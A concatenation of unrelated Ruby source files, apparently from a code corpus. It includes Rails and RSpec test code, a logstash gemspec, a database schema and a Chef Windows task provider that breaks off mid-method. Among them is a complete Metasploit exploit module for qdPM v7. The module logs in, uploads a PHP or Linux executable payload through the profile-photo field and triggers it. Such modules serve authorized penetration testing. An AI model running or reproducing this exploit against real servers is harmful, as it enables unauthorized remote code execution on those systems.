self.errors.add(:base, "Eligible immigration status is required.")
elsif @us_citizen == true && @naturalized_citizen.nil?
self.errors.add(:base, "Naturalized citizen is required.")
end
end
def incarceration_validation
self.errors.add(:base, "Incarceration status is required.") if is_incarcerated.to_s.blank?
end
end
| 35.590957 | 215 | 0.699176 |
e8c163010f8ebdd25a35caf41ca47a354815848d | 145 | # AbstractExpression: 命令・抽象的な表現
class Expression
def |(other)
Or.new(self, other)
end
def &(other)
And.new(self, other)
end
end
| 13.181818 | 31 | 0.655172 |
7af84b39077e5fbeabe6402ef64abaab2fec4a09 | 7,500 | require 'spec_helper'
module Pageflow
describe VideoFilesHelper do
describe '#mobile_poster_image_div' do
it 'has default css classes' do
html = helper.mobile_poster_image_div
expect(html).to have_selector('div.background.background_image')
end
context 'no poster' do
it 'has video_poster_none class' do
html = helper.mobile_poster_image_div
expect(html).to have_selector('div.video_poster_none')
end
end
context 'with mobile_poster_image_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'mobile_poster_image_id' => 98
)
expect(html).to have_selector('div.image_98')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'mobile_poster_image_id' => 98,
'mobile_poster_image_x' => 40,
'mobile_poster_image_y' => 40
)
expect(html).to have_selector('div[style="background-position: 40% 40%;"]')
end
end
context 'with poster_image_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'poster_image_id' => 97
)
expect(html).to have_selector('div.image_97')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'poster_image_id' => 98,
'poster_image_x' => 30,
'poster_image_y' => 30
)
expect(html).to have_selector('div[style="background-position: 30% 30%;"]')
end
end
context 'with video_file_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'video_file_id' => 96
)
expect(html).to have_selector('div.video_poster_96')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'video_file_id' => 96,
'video_file_x' => 20,
'video_file_y' => 20
)
expect(html).to have_selector('div[style="background-position: 20% 20%;"]')
end
end
end
describe '#poster_image_tag' do
context 'with separate poster image' do
it 'includes the poster image url' do
video_file = create(:video_file)
poster_image = create(:image_file)
html = helper.poster_image_tag(video_file.id, poster_image.id)
expect(html).to include(poster_image.attachment.url(:medium))
expect(html).to include(poster_image.attachment.url(:print))
end
end
context 'with unknown poster image id' do
it 'includes the video file poster url' do
video_file = create(:video_file)
html = helper.poster_image_tag(video_file.id, 'unknown')
expect(html).to include(video_file.poster.url(:medium))
expect(html).to include(video_file.poster.url(:print))
end
end
end
describe '#video_file_video_tag' do
it 'sets class as css class' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, class: 'large')
expect(html).to have_selector('video.large')
end
it 'passes controls option to tag' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, controls: 'controls')
expect(html).to have_selector('video[controls]')
end
it 'sets preload to metadata if preload options is true' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, preload: true)
expect(html).to have_selector('video[preload=metadata]')
end
it 'includes sources and high sources for the video file' do
video_file = build(:video_file, id: 200)
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('source[src*="200/medium.mp4"]')
expect(html).to have_selector('source[data-high-src*="200/high.mp4"]')
end
it 'includes unique id in source urls' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, unique_id: 'something-unique')
expect(html).to have_selector('source[src*="something-unique"]')
end
it 'sets data-poster and data-large-poster attribute by video file poster' do
video_file = build(:video_file, poster_file_name: 'poster.jpg')
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('video[data-poster*="medium/poster"]')
expect(html).to have_selector('video[data-large-poster*="large/poster"]')
end
it 'sets data-poster and data-large-poster attribute by custom poster image' do
video_file = build(:video_file)
image_file = create(:image_file)
html = helper.video_file_video_tag(video_file, poster_image_id: image_file.id)
expect(html).to have_selector('video[data-poster*="medium/image"]')
expect(html).to have_selector('video[data-large-poster*="large/image"]')
end
it 'sets data-mobile-poster and data-mobile-large-poster attribute by custom mobile image' do
video_file = build(:video_file)
image_file = create(:image_file)
html = helper.video_file_video_tag(video_file, mobile_poster_image_id: image_file.id)
expect(html).to have_selector('video[data-mobile-poster*="medium/image"]')
expect(html).to have_selector('video[data-mobile-large-poster*="large/image"]')
end
it 'sets width and height data attributes' do
video_file = build(:video_file, width: 100, height: 50)
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('video[data-width="100"][data-height="50"]')
end
end
describe '#video_file_script_tag' do
it 'renders script tag containing video tag html' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script', visible: false, text: /<video/)
end
it 'sets data-template attribute' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script[data-template=video]', visible: false)
end
it 'sets width and height data attributes' do
video_file = create(:video_file, width: 100, height: 50)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script[data-video-width="100"][data-video-height="50"]', visible: false)
end
it 'passes options to video tag helper' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id, controls: true)
expect(html).to have_selector('script', visible: false, text: /controls/)
end
end
describe '#video_file_non_js_link' do
it 'renders link to short video file path' do
entry = create(:entry)
video_file = create(:video_file, id: 100)
expect(helper).to receive(:short_video_file_path).with(entry, video_file).and_return('/video')
html = helper.video_file_non_js_link(entry, video_file.id)
expect(html).to have_selector('a[href*="/video"]')
end
end
end
end
| 32.051282 | 111 | 0.639867 |
7a0052d536bbeddc5af04e6dcd90936ac34c062a | 1,457 | Gem::Specification.new do |s|
s.name = 'logstash-output-s3'
s.version = '4.3.3'
s.licenses = ['Apache-2.0']
s.summary = "Sends Logstash events to the Amazon Simple Storage Service"
s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
s.authors = ["Elastic"]
s.email = '[email protected]'
s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
s.require_paths = ["lib"]
# Files
s.files = Dir["lib/**/*","spec/**/*","*.gemspec","*.md","CONTRIBUTORS","Gemfile","LICENSE","NOTICE.TXT", "vendor/jar-dependencies/**/*.jar", "vendor/jar-dependencies/**/*.rb", "VERSION", "docs/**/*"]
# Tests
s.test_files = s.files.grep(%r{^(test|spec|features)/})
# Special flag to let us know this is actually a logstash plugin
s.metadata = { "logstash_plugin" => "true", "logstash_group" => "output" }
# Gem dependencies
s.add_runtime_dependency "logstash-core-plugin-api", ">= 1.60", "<= 2.99"
s.add_runtime_dependency 'logstash-mixin-aws', '>= 4.3.0'
s.add_runtime_dependency "concurrent-ruby"
s.add_runtime_dependency 'stud', '~> 0.0.22'
s.add_development_dependency 'logstash-devutils'
s.add_development_dependency 'logstash-input-generator'
s.add_development_dependency 'logstash-codec-line'
end
| 48.566667 | 205 | 0.669183 |
b953a7fbcf08490dd36088d937d0be81e63bd3be | 270 | Rails.application.routes.draw do
namespace :api do
resources :images do
resources :comments
end
end
resources :comments
resources :images
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
end
| 19.285714 | 102 | 0.72963 |
87b3bf596ed4fe695d330c2c84bb07da1d950de2 | 139 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_tripify_session'
| 34.75 | 77 | 0.805755 |
7ab890d457ed2d008147ea424a7bf52cbf82606a | 2,516 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20140919152929) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "comments", force: true do |t|
t.text "body"
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "comments", ["response_id"], name: "index_comments_on_response_id", using: :btree
add_index "comments", ["user_id"], name: "index_comments_on_user_id", using: :btree
create_table "questions", force: true do |t|
t.string "image_path"
t.string "title"
t.text "caption"
t.string "slug"
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "questions", ["user_id"], name: "index_questions_on_user_id", using: :btree
create_table "responses", force: true do |t|
t.text "content"
t.integer "user_id"
t.integer "question_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "responses", ["question_id"], name: "index_responses_on_question_id", using: :btree
add_index "responses", ["user_id"], name: "index_responses_on_user_id", using: :btree
create_table "users", force: true do |t|
t.string "name"
t.string "email"
t.string "password_digest"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "votes", force: true do |t|
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "votes", ["response_id"], name: "index_votes_on_response_id", using: :btree
add_index "votes", ["user_id"], name: "index_votes_on_user_id", using: :btree
end
| 34.465753 | 95 | 0.713434 |
b9a5b03fc9e56b49f1765a66e3c734e090b7ec6f | 592 | # frozen_string_literal: true
module Importer
module Factory
extend ActiveSupport::Autoload
eager_autoload do
autoload :ObjectFactory
autoload :StringLiteralProcessor
autoload :ConferenceItemFactory
autoload :DatasetFactory
autoload :GenericWorkFactory
autoload :JournalArticleFactory
autoload :PublishedWorkFactory
autoload :ThesisFactory
autoload :BaseFactory
end
# @param [#to_s] First (Xxx) portion of an "XxxFactory" constant
def self.for(model_name)
const_get "#{model_name}Factory"
end
end
end
| 23.68 | 68 | 0.716216 |
7ad3eea8704f8aca258c998a6e3ea2c5dd0c3526 | 116 | require 'rails_helper'
module CannedMeat
RSpec.describe SubscriptionsController, type: :controller do
end
end
| 14.5 | 62 | 0.801724 |
18dffb31a75a1388164ca41b8fb94f7ccd4a3786 | 963 | # frozen_string_literal: true
# Copyright (c) 2018 Continental Automotive GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module CoreExtensions
module Object
# Global file lock
module Flock
def with_flock(lock_file = '/tmp/global.lock')
file_lock = File.open(lock_file, File::RDWR | File::CREAT, 0o644)
file_lock.flock(File::LOCK_EX)
yield
ensure
file_lock.flock(File::LOCK_UN)
end
end
end
end
| 31.064516 | 74 | 0.719626 |
e845b72976a5a5e2f413a3238b59aa3ebe7a86f8 | 5,410 | # encoding: utf-8
require 'spec_helper'
require 'backgrounder/workers/store_asset'
RSpec.describe CarrierWave::Workers::StoreAsset do
let(:fixtures_path) { File.expand_path('../fixtures/images', __FILE__) }
let(:worker_class) { CarrierWave::Workers::StoreAsset }
let(:user) { double('User') }
let!(:worker) { worker_class.new(user, '22', :image) }
describe ".perform" do
it 'creates a new instance and calls perform' do
args = [user, '22', :image]
expect(worker_class).to receive(:new).with(*args).and_return(worker)
expect_any_instance_of(worker_class).to receive(:perform)
worker_class.perform(*args)
end
end
describe "#perform" do
let(:image) { double('UserAsset') }
before do
allow(image).to receive(:root).once.and_return(File.expand_path('..', __FILE__))
allow(image).to receive(:cache_dir).once.and_return('fixtures')
allow(user).to receive(:image_tmp).twice.and_return('images/test.jpg')
allow(user).to receive(:find).with('22').once.and_return(user)
allow(user).to receive(:image).once.and_return(image)
allow(user).to receive(:process_image_upload=).with(true).once
allow(user).to receive(:image=).once
allow(user).to receive(:image_tmp=).with(nil).once
end
it 'removes tmp directory on success' do
expect(FileUtils).to receive(:rm_r).with(fixtures_path, :force => true).once
expect(user).to receive(:save!).once.and_return(true)
worker.perform
end
it 'does not remove the tmp directory if save! fails' do
expect(FileUtils).to receive(:rm_r).never
expect(user).to receive(:save!).once.and_return(false)
worker.perform
end
it 'sets the cache_path' do
expect(user).to receive(:save!).once.and_return(false)
worker.perform
expect(worker.cache_path).to eql(fixtures_path + '/test.jpg')
end
it 'sets the tmp_directory' do
expect(user).to receive(:save!).once.and_return(false)
worker.perform
expect(worker.tmp_directory).to eql(fixtures_path)
end
end
describe '#perform with args' do
let(:admin) { double('Admin') }
let(:image) { double('AdminAsset') }
let(:worker) { worker_class.new }
before do
allow(image).to receive(:root).once.and_return(File.expand_path('..', __FILE__))
allow(image).to receive(:cache_dir).once.and_return('fixtures')
allow(admin).to receive(:avatar_tmp).twice.and_return('images/test.jpg')
allow(admin).to receive(:find).with('23').once.and_return(admin)
allow(admin).to receive(:avatar).once.and_return(image)
allow(admin).to receive(:process_avatar_upload=).with(true).once
allow(admin).to receive(:avatar=).once
allow(admin).to receive(:avatar_tmp=).with(nil).once
allow(admin).to receive(:save!).once.and_return(false)
worker.perform admin, '23', :avatar
end
it 'sets klass' do
expect(worker.klass).to eql(admin)
end
it 'sets column' do
expect(worker.id).to eql('23')
end
it 'sets id' do
expect(worker.column).to eql(:avatar)
end
end
describe '#store_directories' do
let(:record) { double('Record') }
context 'cache_path' do
it 'sets the cache_path correctly if a full path is set for the cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = '/Users/lar/Sites/bunker/tmp/uploads'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.cache_path).to eql('/Users/lar/Sites/bunker/tmp/uploads/images/test.jpg')
end
it 'sets the cache_path correctly if a partial path is set for cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = 'uploads/tmp'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.cache_path).to eql('/Users/lar/Sites/bunker/public/uploads/tmp/images/test.jpg')
end
end
context 'tmp_directory' do
it 'sets the tmp_directory correctly if a full path is set for the cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = '/Users/lar/Sites/bunker/tmp/uploads'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.tmp_directory).to eql('/Users/lar/Sites/bunker/tmp/uploads/images')
end
it 'sets the tmp_directory correctly if a partial path is set for cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = 'uploads/tmp'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.tmp_directory).to eql('/Users/lar/Sites/bunker/public/uploads/tmp/images')
end
end
end
end
| 39.202899 | 102 | 0.669316 |
abea50ccb76b960237f058fa02111629ebee5c9e | 837 | module MetricFu
class Roodi < Generator
def self.verify_dependencies!
`roodi --help`
raise 'sudo gem install roodi # if you want the roodi tasks' unless $?.success?
end
def emit
files_to_analyze = MetricFu.roodi[:dirs_to_roodi].map{|dir| Dir[File.join(dir, "**/*.rb")] }
@output = `roodi #{files_to_analyze.join(" ")}`
end
def analyze
@matches = @output.chomp.split("\n").map{|m| m.split(" - ") }
total = @matches.pop
@matches.reject! {|array| array.empty? }
@matches.map! do |match|
file, line = match[0].split(':')
problem = match[1]
{:file => file, :line => line, :problem => problem}
end
@roodi_results = {:total => total, :problems => @matches}
end
def to_h
{:roodi => @roodi_results}
end
end
end
| 26.15625 | 98 | 0.572282 |
ff4b154ed183826bdb7146ca90d5b1d2c02ad441 | 8,592 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in qdPM - a web-based project management
software. The user profile's photo upload feature can be abused to upload any
arbitrary file onto the victim server machine, which allows remote code execution.
Please note in order to use this module, you must have a valid credential to sign
in.
},
'License' => MSF_LICENSE,
'Author' =>
[
'loneferret', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '82978'],
['EDB', '19154']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => %w{ linux php },
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 14 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with'])
], self.class)
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Appears if (major+minor).to_i <= 70
end
return Exploit::CheckCode::Safe
end
def get_write_exec_payload(fname, data)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("chmod 777 #{fname}");
exec("#{fname}");
?>
|
php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
return php
end
def on_new_session(cli)
if cli.type == "meterpreter"
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end
@clean_files.each do |f|
print_warning("Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("Unable to remove #{f}: #{e.message}")
end
end
end
def login(base, username, password)
# Login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/index.php/home/login"),
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
'http_referer' => ''
},
# This needs to be set, otherwise we get two cookies... I don't need two cookies.
'cookie' => "qdpm=#{Rex::Text.rand_text_alpha(27)}",
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}/#{base}/index.php/home/login"
}
})
cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : ''
return {} if cookie.empty?
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data
vprint_status("Enumerating user data")
res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
})
return {} if not res
if res.code == 404
print_error("#{username} does not actually have a 'myAccount' page")
return {}
end
b = res.body
user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''
opts = {
'cookie' => cookie,
'user_id' => user_id,
'group_id' => group_id,
'user_active' => user_active
}
return opts
end
def upload_php(base, opts)
fname = opts['filename']
php_payload = opts['data']
user_id = opts['user_id']
group_id = opts['group_id']
user_active = opts['user_active']
username = opts['username']
email = opts['email']
cookie = opts['cookie']
data = Rex::MIME::Message.new
data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')
data.add_part('put', nil, nil, 'form-data; name="sf_method"')
data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')
data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')
data.add_part('', nil, nil, 'form-data; name="users[skin]"')
data.add_part(username, nil, nil, 'form-data; name="users[name]"')
data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
data.add_part('', nil, nil, 'form-data; name="preview_photo"')
data.add_part(email, nil, nil, 'form-data; name="users[email]"')
data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')
data.add_part('', nil, nil, 'form-data; name="new_password"')
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
}
})
return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
end
def exec_php(base, opts)
cookie = opts['cookie']
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'cookie' => cookie
})
if not res
print_error("Unable to request the file")
return
end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty?
print_error("Unable to extract the real filename")
return
end
# Now that we have the filename, request it
print_status("Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler
end
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass)
if opts.empty?
print_error("Login unsuccessful")
return
end
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
@clean_files = [php_fname]
case target['Platform']
when 'php'
p = "<?php #{payload.encoded} ?>"
when 'linux'
bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
@clean_files << bin_name
bin = generate_payload_exe
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end
print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user,
'filename' => php_fname,
'data' => p
})
uploader = upload_php(base, opts)
if not uploader
print_error("Unable to upload")
return
end
print_status("Executing '#{php_fname}'")
exec_php(base, opts)
end
end
| 31.704797 | 154 | 0.561918 |
ff0d338b4805b1802286afcc6830bfe1a9b21427 | 28,083 | #
# Author:: Nimisha Sharad (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../mixin/shell_out"
require "rexml/document" unless defined?(REXML::Document)
require "iso8601" if ChefUtils.windows?
require_relative "../provider"
require_relative "../util/path_helper"
require "win32/taskscheduler" if ChefUtils.windows?
class Chef
class Provider
class WindowsTask < Chef::Provider
include Chef::Mixin::ShellOut
if ChefUtils.windows?
include Win32
provides :windows_task
MONTHS = {
JAN: TaskScheduler::JANUARY,
FEB: TaskScheduler::FEBRUARY,
MAR: TaskScheduler::MARCH,
APR: TaskScheduler::APRIL,
MAY: TaskScheduler::MAY,
JUN: TaskScheduler::JUNE,
JUL: TaskScheduler::JULY,
AUG: TaskScheduler::AUGUST,
SEP: TaskScheduler::SEPTEMBER,
OCT: TaskScheduler::OCTOBER,
NOV: TaskScheduler::NOVEMBER,
DEC: TaskScheduler::DECEMBER,
}.freeze
DAYS_OF_WEEK = { MON: TaskScheduler::MONDAY,
TUE: TaskScheduler::TUESDAY,
WED: TaskScheduler::WEDNESDAY,
THU: TaskScheduler::THURSDAY,
FRI: TaskScheduler::FRIDAY,
SAT: TaskScheduler::SATURDAY,
SUN: TaskScheduler::SUNDAY }.freeze
WEEKS_OF_MONTH = {
FIRST: TaskScheduler::FIRST_WEEK,
SECOND: TaskScheduler::SECOND_WEEK,
THIRD: TaskScheduler::THIRD_WEEK,
FOURTH: TaskScheduler::FOURTH_WEEK,
}.freeze
DAYS_OF_MONTH = {
1 => TaskScheduler::TASK_FIRST,
2 => TaskScheduler::TASK_SECOND,
3 => TaskScheduler::TASK_THIRD,
4 => TaskScheduler::TASK_FOURTH,
5 => TaskScheduler::TASK_FIFTH,
6 => TaskScheduler::TASK_SIXTH,
7 => TaskScheduler::TASK_SEVENTH,
8 => TaskScheduler::TASK_EIGHTH,
9 => TaskScheduler::TASK_NINETH,
10 => TaskScheduler::TASK_TENTH,
11 => TaskScheduler::TASK_ELEVENTH,
12 => TaskScheduler::TASK_TWELFTH,
13 => TaskScheduler::TASK_THIRTEENTH,
14 => TaskScheduler::TASK_FOURTEENTH,
15 => TaskScheduler::TASK_FIFTEENTH,
16 => TaskScheduler::TASK_SIXTEENTH,
17 => TaskScheduler::TASK_SEVENTEENTH,
18 => TaskScheduler::TASK_EIGHTEENTH,
19 => TaskScheduler::TASK_NINETEENTH,
20 => TaskScheduler::TASK_TWENTIETH,
21 => TaskScheduler::TASK_TWENTY_FIRST,
22 => TaskScheduler::TASK_TWENTY_SECOND,
23 => TaskScheduler::TASK_TWENTY_THIRD,
24 => TaskScheduler::TASK_TWENTY_FOURTH,
25 => TaskScheduler::TASK_TWENTY_FIFTH,
26 => TaskScheduler::TASK_TWENTY_SIXTH,
27 => TaskScheduler::TASK_TWENTY_SEVENTH,
28 => TaskScheduler::TASK_TWENTY_EIGHTH,
29 => TaskScheduler::TASK_TWENTY_NINTH,
30 => TaskScheduler::TASK_THIRTYETH,
31 => TaskScheduler::TASK_THIRTY_FIRST,
}.freeze
PRIORITY = { "critical" => 0, "highest" => 1, "above_normal_2" => 2 , "above_normal_3" => 3, "normal_4" => 4,
"normal_5" => 5, "normal_6" => 6, "below_normal_7" => 7, "below_normal_8" => 8, "lowest" => 9, "idle" => 10 }.freeze
def load_current_resource
@current_resource = Chef::Resource::WindowsTask.new(new_resource.name)
task = TaskScheduler.new(new_resource.task_name, nil, "\\", false)
@current_resource.exists = task.exists?(new_resource.task_name)
if @current_resource.exists
task.get_task(new_resource.task_name)
@current_resource.task = task
pathed_task_name = new_resource.task_name.start_with?('\\') ? new_resource.task_name : "\\#{new_resource.task_name}"
@current_resource.task_name(pathed_task_name)
end
@current_resource
end
action :create do
set_command_and_arguments if new_resource.command
if current_resource.exists
logger.trace "#{new_resource} task exist."
unless (task_needs_update?(current_resource.task)) || (new_resource.force)
logger.info "#{new_resource} task does not need updating and force is not specified - nothing to do"
return
end
# if start_day and start_time is not set by user current date and time will be set while updating any property
set_start_day_and_time unless new_resource.frequency == :none
update_task(current_resource.task)
else
basic_validation
set_start_day_and_time
converge_by("#{new_resource} task created") do
task = TaskScheduler.new
if new_resource.frequency == :none
task.new_work_item(new_resource.task_name, {}, { user: new_resource.user, password: new_resource.password, interactive: new_resource.interactive_enabled })
task.activate(new_resource.task_name)
else
task.new_work_item(new_resource.task_name, trigger, { user: new_resource.user, password: new_resource.password, interactive: new_resource.interactive_enabled })
end
task.application_name = new_resource.command
task.parameters = new_resource.command_arguments if new_resource.command_arguments
task.working_directory = new_resource.cwd if new_resource.cwd
task.configure_settings(config_settings)
task.configure_principals(principal_settings)
task.set_account_information(new_resource.user, new_resource.password, new_resource.interactive_enabled)
task.creator = new_resource.user
task.description = new_resource.description unless new_resource.description.nil?
task.activate(new_resource.task_name)
end
end
end
action :run do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status == "running"
logger.info "#{new_resource} task is currently running, skipping run"
else
converge_by("run scheduled task #{new_resource}") do
current_resource.task.run
end
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :delete do
if current_resource.exists
logger.trace "#{new_resource} task exists"
converge_by("delete scheduled task #{new_resource}") do
ts = TaskScheduler.new
ts.delete(current_resource.task_name)
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :end do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status != "running"
logger.trace "#{new_resource} is not running - nothing to do"
else
converge_by("#{new_resource} task ended") do
current_resource.task.stop
end
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
action :enable do
if current_resource.exists
logger.trace "#{new_resource} task exists"
if current_resource.task.status == "not scheduled"
converge_by("#{new_resource} task enabled") do
# TODO wind32-taskscheduler currently not having any method to handle this so using schtasks.exe here
run_schtasks "CHANGE", "ENABLE" => ""
end
else
logger.trace "#{new_resource} already enabled - nothing to do"
end
else
logger.fatal "#{new_resource} task does not exist - nothing to do"
raise Errno::ENOENT, "#{new_resource}: task does not exist, cannot enable"
end
end
action :disable do
if current_resource.exists
logger.info "#{new_resource} task exists"
if %w{ready running}.include?(current_resource.task.status)
converge_by("#{new_resource} task disabled") do
# TODO: in win32-taskscheduler there is no method which disables the task so currently calling disable with schtasks.exe
run_schtasks "CHANGE", "DISABLE" => ""
end
else
logger.warn "#{new_resource} already disabled - nothing to do"
end
else
logger.warn "#{new_resource} task does not exist - nothing to do"
end
end
alias_method :action_change, :action_create
private
# seprated command arguments from :command property
def set_command_and_arguments
